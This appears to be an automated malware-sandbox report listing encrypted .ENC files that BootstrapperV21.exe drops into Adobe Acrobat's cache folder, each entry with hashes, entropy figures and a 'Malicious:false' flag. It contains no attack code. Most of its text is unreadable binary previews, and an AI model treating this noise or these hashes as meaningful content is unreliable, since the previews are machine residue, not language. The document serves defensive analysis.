                                                                                        Preview:...t$&!B.$..I..1P...AIx.O"^..u.:J....8rD..o.....h0K....n.H...~.....@F..&.9.%..................].'.........Z..:$.{.q!b.........j.#Aq...R].........m.A.].....$..n.~..:H.,*.Yz!..`...F._.K*u. W{...R.....K.f.d^....]..9..{v4....l!..:...m'{.[2'......].mU.4;3...d.......12.0;.e.|...`5....^4R..H ..L..j...+..:..X..~h}..c"...7?.z.)5....%....a...&.4....KEHQ.n%...w.=...Q.M...l...v4a.9&...........I8.[.4..C..V]..u];..Z.....xmD..]~....J...:^_+..n[....H.b....K....8/.....%06.....d.d.H...$...T.....&...d.t.(...#{M..L{..!...e..!*wP...p=G.)......F..&e.P./.qB.A.T.Q.l$.o\....!....]..S....3#B...5G.#.].k...F.W...B=z.-.<.)K..Lwrh....Pc..@&.b.<..v.ol..^!..RF....Zs.^o.....6~............W.$l?Ns..<z...<_y.} .|[9.>3..u. .>.......u.9..uG.{.:..F..W.&..H#:i......j.kk...T._i.I.u..>Q..LW*...Ok.....L.LC.8p/..I3gC..0.:DQxi...>,Zpi.*...sE...8.3..[D.q.b.E.2.p"..r.8e.s.....U.@.^..P....Q{.x.z..O.io...T?.....J4.?...2....{...Y#=..|.?....;.m......7F_P.+y..-~./..cJ....f......k.|x.xT)T.

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):304
                                                                                        Entropy (8bit):7.285816237033959
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:efBpm+HnQ6NrNy4XHEFB9S2BW8So8nxc7BdHSNbR+XeaMG7vBaFw:eZprHnvXHERFBW8fKc/+X6vBV
                                                                                        MD5:A7B78419FF81F56199D4AA8DF21F952D
                                                                                        SHA1:B775409A08088D0549C2F25708D92C375CCDE358
                                                                                        SHA-256:D4E3A1F9C86559E1A9D7465E1057A60454FA1B0585BF8C17F709D7C954E97377
                                                                                        SHA-512:5A52BC6055CCEE41F6A28212DAE21EA2C7D5214F96014128C3A79F4298EF2882D12A03DF06E8B18D8E83E89E02AD7B90AFCCC030926CADFE98093FAACE91BA3A
                                                                                        Malicious:false
                                                                                        Preview:..........H.j4..e...2.A...<[io.-....Qp...LY.*av.V.x>.=.IO'...61.ee..4{w@..@.$..i....{..g..?..o.$.m7.X}.. ..ep-\u..'x...K:..........97gQ2.e`'...(...y.g..]9.....8...uU.....bol.(;.....q.^..zQ.x.f.}.{./...X....m.........>.<U.;.......{.K...E.a.p...60O.h..[r..b..........=.......Ou...F...=J.B]^.*.

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):304
                                                                                        Entropy (8bit):7.335764747050519
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:efBpm+HnQ6NrNy4XHEFB9S2BW8So8nxc7BdHSN2eziIH+09eF+sb:eZprHnvXHERFBW8fKc/+2I+//
                                                                                        MD5:9501E4D1AF24B02BF126086BACF47FCA
                                                                                        SHA1:584CBFC26DC194A0FF179BF4DD2EBDEFC4E1BA67
                                                                                        SHA-256:9EF53A71C227549CF722AEC52022BAA07136437D2B9C6FE4907EFE16E209F0BC
                                                                                        SHA-512:F9324D16AA3A80634E54022E8CE54CA887BEAE00466053F02D4A40FB75978057EBDB190A78D0CE1432F1BB117B52083759A9C4255729EAEEE17B37DE57091588
                                                                                        Malicious:false
                                                                                        Preview:..........H.j4..e...2.A...<[io.-....Qp...LY.*av.V.x>.=.IO'...61.ee..4{w@..@.$..i....{..g..?..o.$.m7.X}.. ..ep-\u..'x...K:..........97gQ2.e`'...(...y.g..]9.....8...uU.....bol.(;.....q.^.......9j......Y(...1U@A^"......._.. ..m.:OkH...}..`...u.U;8).(d...h..B..`....^&...Db.2...=zl.2.T.`...>..

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):304
                                                                                        Entropy (8bit):7.278580279993763
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:efBpm+HnQ6NrNy4XHEFB9S2BW8So8nxc7BdHSN2ezXqCEKyg13IXtiT3xiC8:eZprHnvXHERFBW8fKc/+2XHrg14Xkbgp
                                                                                        MD5:CCE4B549259DAFF0A435A810D9F9A65E
                                                                                        SHA1:9FBB0E7A2D849935E415EC1EB850EE05A068DC2E
                                                                                        SHA-256:B9518C5FBE13014EF2EB82266E20C1D53A41131FA8AD15271B4CF1A10F1355BF
                                                                                        SHA-512:B6CC81208D61A635E5C024FDD8FAAABFEF065FCC1F40916FA4A0680DB4B93164E08292FB1D5BF4750941884DBD41B126C13FC5B1B114B7A748B73544511EDBEC
                                                                                        Malicious:false
                                                                                        Preview:..........H.j4..e...2.A...<[io.-....Qp...LY.*av.V.x>.=.IO'...61.ee..4{w@..@.$..i....{..g..?..o.$.m7.X}.. ..ep-\u..'x...K:..........97gQ2.e`'...(...y.g..]9.....8...uU.....bol.(;.....q.^.......9j....!T"..F.n.....Ta.$...P.d..!.*R....ag....qI^G..)........K$..c.p{.sA.4.....p#I.}....:.w...

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):288
                                                                                        Entropy (8bit):7.293387751403369
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:efBpm+HnQ6NrNy4XHEFB9S2BW8So8nxc7BdHSN2ez3y3WagHvlfJYocgR:eZprHnvXHERFBW8fKc/+2cy3WayJYoc4
                                                                                        MD5:067E0DE35FB3F75C6FE1E39DE782C5E5
                                                                                        SHA1:93EB8F613C84B0651B791BC46DE40FC58443ADB3
                                                                                        SHA-256:36A88A01E766EF5C37FF25BCB5072A03D0A471B23777C8F4489B3B1A69FEB94A
                                                                                        SHA-512:851DA4F8170EECCB1FE0E008E204685C88B3125C39FD87FC6FBFCDE830440663AC7A802E5F5B7688F9BC27898FDBCC6403F2CCB43F163F0848ED312D44B556C2
                                                                                        Malicious:false
                                                                                        Preview:..........H.j4..e...2.A...<[io.-....Qp...LY.*av.V.x>.=.IO'...61.ee..4{w@..@.$..i....{..g..?..o.$.m7.X}.. ..ep-\u..'x...K:..........97gQ2.e`'...(...y.g..]9.....8...uU.....bol.(;.....q.^.......9j....9'..:sp..TK.....!.*..j.#.>..Mf.Z...k .~...-........G@.T.RX........`....y..

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1264
                                                                                        Entropy (8bit):7.853985791346065
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ApbnvXkRFQC+9PnXjBnAIJzhKt63x8NV2Se/PuSssPvpkfhDCE73K:wnM/+bnAw9g63WNV2RPuST3pkJP+
                                                                                        MD5:8E409247EF9F3B0A1B2497F4EB6D6C4C
                                                                                        SHA1:A432B83F9A8403115B3E15F6C677EDD6D3BF371B
                                                                                        SHA-256:BC79D20905124ADE50E36CEED0EDA73B94FE4BD6FCDF3304EF02702884506F70
                                                                                        SHA-512:EC7923DAFDA2EFC061471C4774564E005F6238204AF7471165831B07E95492159E9A764DADB2C4F7682BCDD652DBB2D15018E0F6CCEDA7017EEB8AEBFA567ECE
                                                                                        Malicious:false
                                                                                        Preview:..........H.j4..e...2.A...<[io.-....Qp...LY.*av.V.x>.=.IO'...61.ee..4{w@..@.$..i....{..g..?..o.$.m7.X}.. ..ep-\u..'x...K:..........97gQ2.e`'...(...y.g..]9.....8...uU.....bol.(;.....q.^.......9j.....:a..}.;}..........0..1..t-...i75..[j.VD6..T.3I."."/(...-fu.....(..S'....O/......g.d\@..d.4.P.e.t/.".d6/.......L.T....{Y}...gur..?f...o.B....Me..x.m..*n?.. %<.QB..A..]l....../..G...=.(.uL...?.ur.q...b..QF....rI.Q.`3/..V.6.)....p.9..[..C..`..ez-X.9.$......Z.^.nV$..X........y....q....M.r..!..J.u...n^.</.....Mo..X\...DH.&..o3.x.1.8.....Q!..D.E`+.....R7q@..GZ..?..u......'.p.F.km.....RZ.m..........;]0.3%f`...."....<.+.b..t,T.]g.[....+hj...A.S..e.7`.1.{s;y.$..q..U......M.U9R...]&.?....p..d%....g ..9\..I-7[F..,...9(.c.?."..t|...'..........c!.r..5..4ykZ.S...3.l...a.[=|..._.........A....j.9...a..... ..v....")...G...Y.E.(r..k....k.(.4._.v.a.....uHS~.7...?..">...}Nj..7...|g.n...r.s.....L.FF.<.z..P.r...o..V..c.....".TM.Jl.._y.........i ..f.}.F.qn.=.+.

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1264
                                                                                        Entropy (8bit):7.838316682418541
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ApbnvXkRFQC+P22Q6boWbM06fP0G4vVgXSWrTgzhelfKwYFh3Ka4t:wnM/+P22QcR6X03VHwsz0luhU
                                                                                        MD5:2FCF78708B1C5909C09A9007E7A601B4
                                                                                        SHA1:E4294FC54C30F4FA4B84322E278409F5245D46D5
                                                                                        SHA-256:4DD577FD09097D6FEB5E54B7024FBF3DE0CBB5BDD7A3C765E7D92D84EB3D9092
                                                                                        SHA-512:F8645A5D67FD273C35B4BB82A00A6D3EC47F50FFB57B0297C82C7A0F77BA7ABEE2D36065497841C5F015841A2723009B0DEB72C2C4F3F667FD2B93185023A701
                                                                                        Malicious:false
                                                                                        Preview:..........H.j4..e...2.A...<[io.-....Qp...LY.*av.V.x>.=.IO'...61.ee..4{w@..@.$..i....{..g..?..o.$.m7.X}.. ..ep-\u..'x...K:..........97gQ2.e`'...(...y.g..]9.....8...uU.....bol.(;.....q.^.......9j....iz........|.......LK..R. .s.:.NI.1.Q..Z.8..b.......T.mx....a.....b..8..."0z.h..Bd....v...S...^C;.C....#...._.,...l...9\.'...n(..-)..N*.p..`V].B+9.m..I....Y...5..K8. ..h....g...k4d(..Z.../..d+...&........h....7|n*A{..../.4..E.....N._....4..a....RE%3....E..;'....V....)....QN.y*.u^....3\.7..o.5q..v..V..T/.Y...W.%......0;.%.....(...9U.v)..IRh2..E.M.....S........._L;X...W.:.S$.X...;.`......n......R.....a./..V...q.[.o.c....L..........."..<..-^....y.a..X~.S..W.DJ.8r.m@..'.~.8m.f..%/...a.1.p.Q4...0.(0^..a.....#'B.{n.v.q....4|.(...L.....P.GT....)....B.....z...!.tv..2.)tI(....vt.J...c.H@.Z`..P...Z.e..7..V....0w...$U&.3O`......H-[.....E?....Q.M...u.G..*.F..H..,5.r..C.r"P.3r.C...F.....kFF..EZ.Z.w.H..4.Uk..O..._d..c..<......w.*.}.U"V8.h?..Zn..t..t...

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):304
                                                                                        Entropy (8bit):7.344156162999452
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:efBpm+HnQ6NrNy4XHEFB9S2BW8So8nxc7BdHSN2ezdPrMo3RfeEpHgAe+ngxX8GC:eZprHnvXHERFBW8fKc/+2m9UEpHhyi
                                                                                        MD5:6072C3B39841CE100E46350A49D1794B
                                                                                        SHA1:1CE4ED687CDD4342E51E4745445FC4EFF65F839E
                                                                                        SHA-256:52655E6695CAF260FEDABDFE872B0FF9675FA03FBB4B9AAE5812812BE39DF860
                                                                                        SHA-512:1C6968936B475EB139886CED3D1B3B4074312DFE295413EC964C7DC30AC1EA300F06E5D1483C20A021414E3EB8FDE8100BCF227C8FA896433EBF341AD30786B0
                                                                                        Malicious:false
                                                                                        Preview:..........H.j4..e...2.A...<[io.-....Qp...LY.*av.V.x>.=.IO'...61.ee..4{w@..@.$..i....{..g..?..o.$.m7.X}.. ..ep-\u..'x...K:..........97gQ2.e`'...(...y.g..]9.....8...uU.....bol.(;.....q.^.......9j....iz........|.....X.4:...%.b..3!...jm##.A..*JyO.P...~........N....0H]i.6jU..Hx.....C.....1*

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1232
                                                                                        Entropy (8bit):7.876922485758311
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ApbnvXkRFQC+Y3dPpxeWciPDYsWgpkJjKhkjsAekk7ylrpVV0erA/VF7aMP0B:wnM/+YNP7NjVuNKhkQAeXelrP6e0tFZg
                                                                                        MD5:A62406EF986CCED0115087347172124D
                                                                                        SHA1:DB1C4F33701125526333BDF164E8E2E717140073
                                                                                        SHA-256:A53B8DE64AD9599289AC3B4730AA281E57A355390111F3594C385FBAFA93E288
                                                                                        SHA-512:99856DD63B08E194516CA2AC6C0B92622B99B7521800FB9B72132BEFCB0DD6BFA89D16EF80C29CEE45526CD0CAC8E9C8128FAB12B5032D2FE8FD06E9473ED9E9
                                                                                        Malicious:false
                                                                                        Preview:..........H.j4..e...2.A...<[io.-....Qp...LY.*av.V.x>.=.IO'...61.ee..4{w@..@.$..i....{..g..?..o.$.m7.X}.. ..ep-\u..'x...K:..........97gQ2.e`'...(...y.g..]9.....8...uU.....bol.(;.....q.^.......9j..........#_....O.......t..(x...."+.L...Du.KyjJ.Y.>%u..'>..Uo2..I./`#.Sg..x b....A...(.qa6......E.P[3:R.`.....[...NXLC_..g/.t.8..|.R.....7..Y[^^8.8....\..).G......S..A.0..u....u..XR..*.....;>x..&\;3y...............k.c..s.u.u?o.F&.4Z......~k.v......."&.Q.0mb..g......?$...8.5#a.f.dma.-.......<........v...&.j...u...~.7o...Qb..HwM...?}.*....IF.R.......W.....^..K.?a...2b....N.7.b.#.@'....ty.t.W2..O(D.......]....8....k...&..N*...Rs....{.........&Y:....0|.7...\*.d....N5Hn.wZ.1\.=....e.[J..3.w....GQ~.].9H3 h..5.....8..@LY....@._fM..n./*.-..Fz...%W.N.@.!YzN...`....% .p..:.G..o...#p...o.b..DU....@.|b.9.AQ.AH....._Fef....Ke6.r.C#%.O}.Y....6gu4..eq...+........<.u.].....~...!.b..Y.M...W.|..N....B.:.A.....#oh..K....hSh$.......L.?/`.V..@..TW...P...U....rK.&qp.4

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):304
                                                                                        Entropy (8bit):7.262397107169605
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:efBpm+HnQ6NrNy4XHEFB9S2BW8So8nxc7BdHSN2ezD/0Klnwk8LG+CLsUZ9xzL58:eZprHnvXHERFBW8fKc/+2GMg1cG9LsKK
                                                                                        MD5:E0D54C1A25646217DBADDB4F22F4CFED
                                                                                        SHA1:A4DBC68D3F0D9B945E93206BFDD35526E61A8A01
                                                                                        SHA-256:1862A65EC4303B88DBF415A187818BBDC8240D13073C568D372176872A1D357E
                                                                                        SHA-512:4FEEF5E4275B7278A4551BF05F7B74DD3E49C03A95CC6C34D7C62D44A200D97B1B51E03A12008F8CECF1AF84C4CC365B6D901707D6FE71B87626AA116D24E729
                                                                                        Malicious:false
                                                                                        Preview:..........H.j4..e...2.A...<[io.-....Qp...LY.*av.V.x>.=.IO'...61.ee..4{w@..@.$..i....{..g..?..o.$.m7.X}.. ..ep-\u..'x...K:..........97gQ2.e`'...(...y.g..]9.....8...uU.....bol.(;.....q.^.......9j....8R#.......Fz^\...."$.{.........a..j..t.5.K.. ..ggn....yu.....1...&.y..............^y ..E.@."

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):304
                                                                                        Entropy (8bit):7.305553079139221
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:efBpm+HnQ6NrNy4XHEFB9S2BW8So8nxc7BdHSN2ezkpZv5GcOQCpGlHh:eZprHnvXHERFBW8fKc/+2KylB
                                                                                        MD5:CA5886987880BAE8E515075A0B4E9FAD
                                                                                        SHA1:D265E4EC2D392837B56DA5290C40A6D9F174785E
                                                                                        SHA-256:579653884986E134CBE28D5AB7FAAC0C4E750685373045C580B3A8608630E715
                                                                                        SHA-512:294899C7DA3452F491DDC07887AB2BDC87E3F329BED84FCA146AAF791055448E35ABB8F369654084266E5998945C096312D561CF910DD066072FDC6844874168
                                                                                        Malicious:false
                                                                                        Preview:..........H.j4..e...2.A...<[io.-....Qp...LY.*av.V.x>.=.IO'...61.ee..4{w@..@.$..i....{..g..?..o.$.m7.X}.. ..ep-\u..'x...K:..........97gQ2.e`'...(...y.g..]9.....8...uU.....bol.(;.....q.^.......9j.....x).Zl....zg..(.o-.'..C...Bo.V...tR`D.....]/...>...405.YDe.?..v-..C....0..%.L,.. ..n.w..m...

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1408
                                                                                        Entropy (8bit):7.861214755528935
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ApbnvXkRFQC+nz9e6VlowmENySTYk/QIls+1RnmRU3cBiN8WnWlzNs0dWPQqLxAo:wnM/+n3v0yS+Hn73c82WncsAKpn
                                                                                        MD5:D8F949F27BA8C0E34FC29D771FCC2153
                                                                                        SHA1:1DA2CC63AAFB98760A3BB58DE63305C80BA7EB6D
                                                                                        SHA-256:15D390243996544938F745D8C8DD8DE6AF5617F07DCDD2D3C456468729BA843C
                                                                                        SHA-512:23165472AB0960A1F1DE1B133CEC636D909DD8E7BFC8D22EB9766E7857B3E388F556EA5C6F59E46FD1BB74FA3B7F2D3A4DD42BEF04203C74B939AD2B010BA4C7
                                                                                        Malicious:false
                                                                                        Preview:..........H.j4..e...2.A...<[io.-....Qp...LY.*av.V.x>.=.IO'...61.ee..4{w@..@.$..i....{..g..?..o.$.m7.X}.. ..ep-\u..'x...K:..........97gQ2.e`'...(...y.g..]9.....8...uU.....bol.(;.....q.^.......9j....V9}...GF........Cl..[uG.0.>....{.b.>.......F.T*:.L..+.....V..9..."..,..N......7.K..@B./.w...E.".J....b...].0.&...>..'X.r.}..@QM..$.c@h.O...o|..Vw..`.B.:...PO>....:..m{M.j[.DU.<..i8}....A>.W.[......A..~.......=x...D.'..kb.......b.k...I......!....=........&....an^>(..<..@S..!.?~......yJ6.v..q....w...,..3$jm.iI^..).dT..a.o...~.RE.K.G.."D.>LC."...&&.q..X..8.d)..utP..._3..)......-...6.{t.@.(4....#.m....6..Y.....Gp#.^>'8.{.s~...>....Y....dL....Ev#..j.6:....r.tUn...J.s!.t.#X.A.?..n..J...|.@}e..%x....r>..s.^Y..e.*.7..z...6..p.4....rJd.2....H........1..z...u.....L1...i..af.Aj.....y...S.:..~.Cx..q.;..,..q.7!....\.w.]9b... ...\.....6..R&.....7.`.r..c.o.........r.i..f..X.v.@..6..kiZ.4D..[b..>.S...U.,..:.G.......l2y.N.....~.&....*6.......*.Y.4...]..\:..."..z.Kk

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):304
                                                                                        Entropy (8bit):7.3224782338356915
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:efBpm+HnQ6NrNy4XHEFB9S2BW8So8nxc7BdHSN2ezLREJ8NZjZELrZqXX:eZprHnvXHERFBW8fKc/+2xJGdaLryX
                                                                                        MD5:C9007E55B0A148CFEB5201C4A633805C
                                                                                        SHA1:1E4D5079BC6291B1ABE9B48EAD9D912F4F88C629
                                                                                        SHA-256:4401F646854C17CFABE5AF19240B38466F9EF661D12324B0D9A11345DF7B98F0
                                                                                        SHA-512:EEA4E2AAC2581498FD85803C30E397588E14B430BE267F4049BC708F0505F6C53A018DB139ABB2D820080E1EE9527AE0EE75E64BAEC98511DF910F610870BA4A
                                                                                        Malicious:false
                                                                                        Preview:..........H.j4..e...2.A...<[io.-....Qp...LY.*av.V.x>.=.IO'...61.ee..4{w@..@.$..i....{..g..?..o.$.m7.X}.. ..ep-\u..'x...K:..........97gQ2.e`'...(...y.g..]9.....8...uU.....bol.(;.....q.^.......9j.........nf.z3KNW..M.8C.].Yj".g..<.^x}w.....s.N....5.4b............~.5j7.6ZE...U.Da..n.....J.Q.+.

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):288
                                                                                        Entropy (8bit):7.188391810578619
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:efBpm+HnQ6NrNy4XHEFB9S2BW8So8nxc7BdHSN2ezh+de9jj5uIQJAxX93n:eZprHnvXHERFBW8fKc/+2E+deN5HQJu5
                                                                                        MD5:D61807314E657FF8F8237C502EC71E53
                                                                                        SHA1:0F3CC049C28B396F449CF732706A008AF8D275F4
                                                                                        SHA-256:62941FF76C937D576B5ECC70B726BE067B8E593A9D2333E77ABFD30479A123E7
                                                                                        SHA-512:223828CB9F8000E989A401654FFC853F3DA84DF9C73D68F378B6AF204E03EEEAF88D7400899B7233C2F375F3B72D9748D0C3683CC860BCBDFD6FB45B0823A8BB
                                                                                        Malicious:false
                                                                                        Preview:..........H.j4..e...2.A...<[io.-....Qp...LY.*av.V.x>.=.IO'...61.ee..4{w@..@.$..i....{..g..?..o.$.m7.X}.. ..ep-\u..'x...K:..........97gQ2.e`'...(...y.g..]9.....8...uU.....bol.(;.....q.^.......9j.....<.A...0...ua...4.r.yq..*......dm.*.gi0.u.K-u%."..-_.\....@..o)o...Le.4xT..

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1264
                                                                                        Entropy (8bit):7.847957913968125
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ApbnvXkRFQC+phTYY1BrRaL2CqpSkW5vqr9qbRv9b6smk3RSOJmR:wnM/+7TYgr8LBgTW5ir9qbRv56OGR
                                                                                        MD5:A1402771123A7A979620FBB1B212A025
                                                                                        SHA1:67509E1576B616B71A2E2232DCC44BD3721316C9
                                                                                        SHA-256:D49F35D62E4C14B571F797E2C2A93C2A4313CE5A14F97CF46B138255AC096246
                                                                                        SHA-512:D68BB4A0AA117799C090B5F96FA06AA7A59DE2A41DFF198E7806426F4D4AFE3A1A755CFE44E57635B7ED77FE338906D65817065AC43381661A63988DC4F477C8
                                                                                        Malicious:false
                                                                                        Preview:..........H.j4..e...2.A...<[io.-....Qp...LY.*av.V.x>.=.IO'...61.ee..4{w@..@.$..i....{..g..?..o.$.m7.X}.. ..ep-\u..'x...K:..........97gQ2.e`'...(...y.g..]9.....8...uU.....bol.(;.....q.^.......9j....;.....O.....m.U..?#....:....o#O?E.......j,....|J...k.....T..X...n...\..l..|......H......b(...Y.A.7]P.f..z.b...}..rcU|...k.\...$.9.5k(..u80e..#...aL....qSa.&n...t.2...<.....I. .sz'H.r.J../.....UJaf...L....`...w.~.6.k.%.nn..y.V..Y.g.S\..Z...}..{V....w.Y.{Xn.Z]R.i./LU.....B5..7..G4..........$0.l.po..L.r...Y.|..sNL..8Xz...XX..o.).D.........v`q(.O..'.9...X...!......M,...O.w[wp.Wg.Y....<}.... t{eoh.YJ'2ia7.....Kii!y....!&.F)..k..0.m9:..:......wj.\..@........fx....?{...'.`IKP.s6l....o....\.r.%..`v.*.......1..2l......;.....i.l9..8....{.D..&(...h...*..*-.T.o..#z.Yfm#0X....>._...h..j2..*.n.<.T8..uU...@.w..5.].$].Dv4......X...y....|....C.y..K........_;#.....(.x.....TT..L*.1.u......G......]..".0.p.,TEf..'....'?.....Wx...[.O..w...b.

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):5232
                                                                                        Entropy (8bit):7.9614472005238515
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:wM/+bwEYMajt8MbRzQgh35H5y422ckjQ6J4nrndeJuhLMyMn:wMWbbnaWMnh35ZyPjReyVMn
                                                                                        MD5:B055E506EDA0A806CA18B449DE19BBA5
                                                                                        SHA1:571BCACA01188E04B4184C171B3DED24C88BC33E
                                                                                        SHA-256:F1798612BEFEDBE85122121DF13622E79935FEA125D04E0F83A57FB31241FB40
                                                                                        SHA-512:86E7CD693A6C304CAD5A579344B8D96C02FCBDFD7BDC44EF102F082198BF46D8CE95AA0789042251F6892A6C58C8517DB486B7F5F6265FE2849AB58799183120
                                                                                        Malicious:false
                                                                                        Preview:..........H.j4..e...2.A...<[io.-....Qp...LY.*av.V.x>.=.IO'...61.ee..4{w@..@.$..i....{..g..?..o.$.m7.X}.. ..ep-\u..'x...K:..........97gQ2.e`'...(...y.g..]9.....8...uU.....bol.(;.....q.^.......9j......>.K.(.r......A.R..E.I.....\`W.o.i...UoK<.b...0....u$}Q..Ny.t..p>u.\F.D~mx.I....~......Y:.5...\...(.._G...:.O..l*..*...X.\.y...81..I*.\U.l.@].NS...e.2.....o....VOaG..F...9+..'!......`.`.[..ZF#)..M.L.*X.J.6*W........^.!..^.y.....]QLG...w....F.u^5...x...'c...........R..y....,.}.08...f.N.y>....j..R.'..R"...: !..)..[.....t.:._....o.?.@6?e...:L)...B...*F.P\...i........*.:....^&...&...U...I.@mM..2..L..z%_MG..I.Ih..u...vVV......v.=^.0.....`.R...Oo.w.i%.|.%D.......[.h7.. .....=.kK.A...@.-.p..\.ycg..Z......O-....6.u!C....y!....>..).9w.4...._.R.)*.]..s....!.A8.-..#.....k......_^..y....w...g..G.?.Y..l.u.......w..p......a..&...mBIG...%T-B.c...d..?.x.....tU..../E.1Z.w.B.m'.V.~.....~.Y..@...aE.H..XHC...4.+.8.....5...._u.6jA.1+.u.~..^..#^#....76.....W..{.Q[.L

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):784
                                                                                        Entropy (8bit):7.779090556741637
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ApbnvXkRFQC+BXvNvbgdMH0diqlFH3cA9rSqR:wnM/+pvpeMURFH3pZR
                                                                                        MD5:7E5EF279AEE907C27A4B2D369D0DCD28
                                                                                        SHA1:4069B4848810E80B89941EDBF29C00BDFF846B56
                                                                                        SHA-256:C7A4873310233947631EAE0A8F626722FE8793B7F46D1CE382C10E5ECFE06792
                                                                                        SHA-512:CDCFC543B831C35F43EC9131C5FFCC16492FF802E2B1420CDF64B42E3700D12FA3CD072422965412572EB996A99DC4E41D9088D2E25433B6ACC0CC2D469F203D
                                                                                        Malicious:false
